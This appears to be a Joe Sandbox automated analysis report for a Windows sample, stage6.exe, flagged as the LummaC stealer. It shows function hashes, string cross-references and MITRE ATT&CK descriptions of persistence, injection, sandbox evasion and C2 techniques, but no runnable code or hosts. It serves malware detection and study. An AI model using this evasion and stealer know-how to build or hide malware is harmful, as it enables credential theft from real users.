Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A

Function 004385E0 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB

Function 00425E70 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389

Function 00430C70 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
Instruction ID: f5f621b67306c00f1b1f1892e0c4b111cdc11732c84e43f9357b9df5953cc386
Opcode Fuzzy Hash: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
Instruction Fuzzy Hash: 3E7160B840AB848FE774DF04D45868ABBE0FB8A358F52991ED48C47311C7B92448CF9B

Function 0041BF14 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
Instruction ID: 2e66319cfaede8187dee7502eb2bdf6532bbee011b37898b3e62ff9ec94ea10c
Opcode Fuzzy Hash: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
Instruction Fuzzy Hash: 2C1166324092905AC314CB289940737BBE19B87310F584A5DF4D6E32E1D728CC028B8A

Function 00435450 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359

Function 0042A700 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E

Function 00428D93 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95

Function 0043CA93 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8

Function 00423086 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D

Function 00427AD3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E

Function 0041C653 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E

Function 0040BFFD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 0042984F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E

Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043179A

Strings

#, xrefs: 00431899
{, xrefs: 004318E1
], xrefs: 00431849
n, xrefs: 004318D1
B, xrefs: 0043188F
Q, xrefs: 00431853
4, xrefs: 00431821
0, xrefs: 0043182B
;, xrefs: 00431817
H, xrefs: 004318AD
, xrefs: 0043183F
J, xrefs: 00431885
0, xrefs: 00431980
/, xrefs: 00431867
B, xrefs: 00431871
^, xrefs: 0043185D
m, xrefs: 004318B7
O, xrefs: 0043187B
G, xrefs: 004318A3
~, xrefs: 004318C1

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431360

Strings

;, xrefs: 004313DD
^, xrefs: 00431423
~, xrefs: 00431487
], xrefs: 0043140F
O, xrefs: 00431441
m, xrefs: 0043147D
#, xrefs: 0043145F
G, xrefs: 00431469
B, xrefs: 00431437
n, xrefs: 00431497
0, xrefs: 0043153F
J, xrefs: 0043144B
Q, xrefs: 00431419
{, xrefs: 004314A7
B, xrefs: 00431455
0, xrefs: 004313F1
H, xrefs: 00431473
, xrefs: 00431405
/, xrefs: 0043142D
4, xrefs: 004313E7

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042E9F6
VariantInit.OLEAUT32 ref: 0042EA05

Strings

4, xrefs: 0042EA70
b, xrefs: 0042EA3C
(, xrefs: 0042EA80
,, xrefs: 0042EA90
2, xrefs: 0042EA68
., xrefs: 0042EA98
Q, xrefs: 0042EA2C
6, xrefs: 0042EA78
T, xrefs: 0042EA24
:, xrefs: 0042EA48
8, xrefs: 0042EA40
<, xrefs: 0042EA50
>, xrefs: 0042EA58
*, xrefs: 0042EA88
0, xrefs: 0042EA60
-, xrefs: 0042EA94
W, xrefs: 0042EA34

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6

Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F83F
VariantInit.OLEAUT32 ref: 0042F84E

Strings

6, xrefs: 0042F8C7
., xrefs: 0042F8E7
(, xrefs: 0042F8CF
W, xrefs: 0042F883
>, xrefs: 0042F8A7
2, xrefs: 0042F8B7
T, xrefs: 0042F873
b, xrefs: 0042F88B
0, xrefs: 0042F8AF
8, xrefs: 0042F88F
,, xrefs: 0042F8DF
4, xrefs: 0042F8BF
-, xrefs: 0042F8E3
<, xrefs: 0042F89F
Q, xrefs: 0042F87B
:, xrefs: 0042F897
*, xrefs: 0042F8D7

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66

Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043244F

Strings

C, xrefs: 00432481
@, xrefs: 004324A9
[, xrefs: 004324C7
X, xrefs: 0043246D
e, xrefs: 004324B3
E, xrefs: 00432495
H, xrefs: 004324D1
X, xrefs: 00432477
J, xrefs: 0043248B
Q, xrefs: 0043249F
L, xrefs: 004324BD
@, xrefs: 004324E5
A, xrefs: 004324EA
[, xrefs: 004324DB

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757

Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004321C6

Strings

J, xrefs: 00432209
e, xrefs: 00432231
C, xrefs: 004321FF
L, xrefs: 0043223B
@, xrefs: 00432227
E, xrefs: 00432213
[, xrefs: 00432245
X, xrefs: 004321EB
X, xrefs: 004321F5
A, xrefs: 00432268
H, xrefs: 0043224F
Q, xrefs: 0043221D
@, xrefs: 00432263
[, xrefs: 00432259

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757

Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431EE7
VariantInit.OLEAUT32 ref: 00431EFA

Strings

p, xrefs: 00431FBF
e, xrefs: 00431F1F
A, xrefs: 00431F8F
p, xrefs: 00431F9F
v, xrefs: 00431F3F
z, xrefs: 00431F2F
n, xrefs: 00431FAF
w, xrefs: 00431F4F
e, xrefs: 00431F5F
z, xrefs: 00431F6F

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report stage6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

